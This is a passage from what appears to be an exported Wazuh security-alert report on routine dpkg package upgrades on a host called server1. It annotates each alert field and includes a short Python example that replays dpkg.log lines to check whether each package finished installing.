General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.16365
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-libc-dev:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state dpkg recorded in /var/log/dpkg.log at this step, not the result of a query. A normal install or upgrade passes through unpacked and half‑configured on its way to installed, so half‑configured alone is transient; it only matters if a package is still there once apt has finished (dpkg --audit lists those), which means its postinst script failed.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Architecture the package was built for, not the host CPU: amd64 here; architecture‑independent packages show all.

data.version:  6.8.0-58.60
Package version on this log line. The same package appeared above at 6.8.0-57.59, so this burst is an upgrade to 6.8.0-58.60, not a fresh install; linux-libc-dev and linux-tools-common are built from the same linux source package, which is why both move at once.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.222+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.222+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
GPG 13 mapping – UK Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.16852
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status installed linux-libc-dev:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Package state dpkg recorded in /var/log/dpkg.log at this step, not the result of a query. installed is the terminal state: the package is unpacked and its postinst script completed, so this line closes the half‑configured alert for the same package and version.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Architecture the package was built for, not the host CPU: amd64 here; architecture‑independent packages show all.

data.version:  6.8.0-58.60
Package version on this log line. The same package appeared above at 6.8.0-57.59, so this burst is an upgrade to 6.8.0-58.60, not a fresh install; linux-libc-dev and linux-tools-common are built from the same linux source package, which is why both move at once.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
GPG 13 mapping – UK Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.17325
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status installed linux-tools-common:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Package state dpkg recorded in /var/log/dpkg.log at this step, not the result of a query. installed is the terminal state: the package is unpacked and its postinst script completed, so this line closes the half‑configured alert for the same package and version.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
Architecture the package was built for, not the host CPU: all means architecture‑independent content (scripts, data), so it is not a CPU type to match against.

data.version:  6.8.0-58.60
Package version on this log line. The same package appeared above at 6.8.0-57.59, so this burst is an upgrade to 6.8.0-58.60, not a fresh install; linux-libc-dev and linux-tools-common are built from the same linux source package, which is why both move at once.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
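
Rules 2902 and 2904 fire on single dpkg.log lines, so one upgrade fans out into a pile of Medium alerts. The added example below (not the Wazuh dpkg decoder) replays the six status lines from the rule 2902/2904 alerts on this page, in page order, and rebuilds each package's state sequence, so the question becomes "did every package reach a final state?" rather than "what is half‑configured?". The state sets and verdict names are this example's assumptions.

```python
import re

# The six dpkg.log lines from the rule 2902/2904 alerts on this page, in page order.
PAGE_LINES = [
    '2025-04-24 22:22:53 status half-configured linux-libc-dev:amd64 6.8.0-57.59',
    '2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-57.59',
    '2025-04-24 22:22:54 status half-configured linux-libc-dev:amd64 6.8.0-58.60',
    '2025-04-24 22:22:54 status installed linux-libc-dev:amd64 6.8.0-58.60',
    '2025-04-24 22:22:54 status installed linux-tools-common:all 6.8.0-58.60',
    '2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-58.60',
]

STATUS_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) status (?P<state>[a-z-]+) '
    r'(?P<pkg>[^:\s]+):(?P<arch>\S+) (?P<version>\S+)$')

# dpkg walks a package through transient states (half-installed, unpacked,
# half-configured, triggers-*) before it settles; only these mean the work is done.
FINAL_STATES = {'installed', 'config-files', 'not-installed'}   # assumption


def parse_status(line):
    """Fields of one 'status' line, or None for startup/configure/trigproc lines."""
    m = STATUS_RE.match(line)
    return m.groupdict() if m else None


def timelines(lines):
    """pkg:arch -> [(state, version), ...] in log order."""
    out = {}
    for line in lines:
        ev = parse_status(line)
        if ev is None:
            continue
        out.setdefault(f"{ev['pkg']}:{ev['arch']}", []).append((ev['state'], ev['version']))
    return out


def assess(lines):
    """pkg:arch -> versions seen, last recorded state, and a one-word verdict."""
    report = {}
    for key, steps in timelines(lines).items():
        versions = list(dict.fromkeys(v for _, v in steps))   # ordered, deduplicated
        last_state = steps[-1][0]
        if last_state not in FINAL_STATES:
            verdict = 'unresolved'          # still mid-transaction inside this window
        elif len(versions) > 1:
            verdict = 'upgrade-complete'
        else:
            verdict = 'install-complete'
        report[key] = {'versions': versions, 'last_state': last_state, 'verdict': verdict}
    return report


if __name__ == '__main__':
    for key, r in assess(PAGE_LINES).items():
        print(f"{key:26s} {' -> '.join(r['versions']):28s} last={r['last_state']:16s} {r['verdict']}")
```

Within the lines shown on this page linux-libc-dev ends at installed 6.8.0-58.60 (a completed upgrade from 6.8.0-57.59), while the last visible line for linux-tools-common is half‑configured. Because the report is cut off here, that is an "unresolved in this window" result, not a broken package: extend the window, or run dpkg --audit on server1, which prints only packages genuinely left half‑configured.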

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.17802
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.18293
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured man-db:amd64 2.12.0-4build2
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  man-db
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  2.12.0-4build2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.680+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.680+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.18770
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:56 status installed man-db:amd64 2.12.0-4build2
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  man-db
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  2.12.0-4build2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.229+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.229+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.19233
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:00 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.3
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.19732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.20231
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status installed libarchive13t64:amd64 3.7.2-2ubuntu0.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  libarchive13t64
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  3.7.2-2ubuntu0.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.20716
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status half-configured libc-bin:amd64 2.39-0ubuntu8.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
